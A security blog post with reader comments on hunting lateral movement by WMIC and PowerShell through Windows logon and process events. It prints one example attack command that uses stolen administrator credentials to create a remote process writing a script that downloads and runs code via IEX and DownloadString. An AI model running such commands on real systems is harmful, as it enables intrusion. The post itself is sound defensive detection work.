Wednesday, August 24, 2016

Hunting From The Top

A few years ago David Bianco produced the Pyramid of Pain as a way to measure the cost to an adversary as it relates to detecting different types of IOC’s.  I think this really is a great way to measure your detection if you look across all of your signatures and identify where they are on the pyramid.  If the majority are at the bottom it wouldn’t take much for an adversary to change a few simple things and you would completely lose sight of them.  The same can be said for hunting.  A few days ago I talked about the need to think about behaviors and the artifacts that those behaviors would create.  I think this is a very important concept and something that can help you begin to hunt from the top of the pyramid.

We know that during targeted attacks an adversary will typically need to move laterally in order to access the data they are after.  If we hypothesize about the different ways an adversary will move from machine to machine we can begin to build out some questions that we need to ask. To illustrate, lets say that we hypothesize that an adversary will take advantage of wmic and powershell to help facilitate lateral movement through our network.  These have been widely reported so it makes sense that we try and identify anomalous use of these tools.  When planning our strategy we first need to understand how these tools are being used so that we can mimic the behavior in a test environment.  

Consider the following command
wmic /node: /user:"pwned\administrator" /password:”abc123" process call create “powershell.exe -Command add-content -path ‘C:\bad.ps1' { IEX (New-Object Net.WebClient).DownloadString(‘' )}"

If I were to review the windows security event logs we would see that when the source executed the command it would generate a 4648 logon event with the source process of wmic.exe.  Following this I would probably want to see how prevalent this is in my environment.  Ask yourself and try and determine the following questions:
  1. Do admins typically execute wmic against remote machines?   
  2. What user accounts are typically seen in legitimate activity?
  3. When they authenticate, are they authenticating as the same user or are they authenticating as a different user to run the command.
  4. Did the source attempt to authenticate to a single machine or multiple machine with the same user account?
  5. What are the roles of these machines? 
  6. Can I tune out normal activity based on the answers to the above as well as recurring volume?

On the destination side I would see in the windows security event logs a 4624 type 3 login as well as a 4688 event where wmiprvse.exe is the parent process of powershell.exe. I would also see that when powershell downloaded bad.ps1 I would have seen an http GET request with no User-Agent string.  Some questions to ask may be:
  1. Does wmic normally spawn powershell in my environment?
  2. If this typically occurs, can I whitelist based off of known usernames and hostnames?
  3. For anomalies, what are the roles of the machines?
  4. What other processes are child processes of powershell where wmiprvse is the parent.
  5. How often is a .ps1 file fetched from the internet with no User-Agent?
  6. What are other files being downloaded with no User-Agent?

When reviewing the data it also helps to only include fields that are pertinent to what you are looking for.  It’s much easier to find anomalous activity when you have only relevant data in front of you.  Here are some ways that I find helpful when looking at 4648 events. 
  1. processes that were used to initiate a type 4648 logon.  Stack the process name by count and focus on low counts. 
  2. src user != dest user stack by count
  3. src user = src user stack by count
  4. src host and dest host stack by count 
  5. src user != dest user and  src host != dest host count by dest host
  6. src user != dest user and  src host != dest host sort by time
  7. time, src host, src user, dest host, dest user, anomalous process

To sum things up I think the following steps are important to building any new hunt.  Hypothesize, understand behavior, formulate questions, test data, build queries, automate collection and presentation of data.  As always, I would love to hear any questions or feedback. You can also find me on twitter @jackcr. 


  1. Jack,

    Great post, but as an incident responder, I rarely see clients who have their endpoints instrumented to collect process information.

    Also, I've seen cases where we have instrumented the client's endpoints, and found that the admins were doing things as part of remediation that were similar to (albeit not exactly like) what the bad guys were doing. ;-)

  2. Yeah, unfortunately this is a sport where you are limited by the data you collect. If anything, I hope that people understand the data they have and how to ask the right questions of it to find anomalies that may indicate attacker activity.

    1. I preach instrumentation and visibility pretty religioiusly. You can't say that something did or didn't happen if you don't have the ability to determine it either way, let alone "see" or record it. There have been many times when I've gone back to a client and said, "...we cannot answer that question definitively", and when asked what we would have needed, very often the answer is process creation data.

      There have been a number of us who have been extolling the virtues of instrumentation for years, illustrating the value over and over again. Bad guy RAR'd up your data and added a password? No problem...*if* you captured the full command line. You go from a "Naval Academy salute" to full disclosure in seconds.

    2. With you being a consultant and having the opportunity to work with many different companies. Do you find that after a major intrusion these companies make big spends in visibility and people?

  3. worst, SIEM in the enterprise only collect logs on the servers and not on the endpoints.. thus, only half of the story is told

  4. Jack, What do you mean by stack by count? Would you be able to provide an example? I have been following your blog and using to build capability within our environment. Thanks for putting this blog together.

  5. Basically placing the process name in one column, the number of times that process occurred in a 4648 logon event in a second column and ordering by that number of times.

    You could also add things like usernames and machine names in additional columns and order in different ways to find anomalies. The dataset may get very large, but it also may give you a different perspective of machines that are communicating and how they are communicating.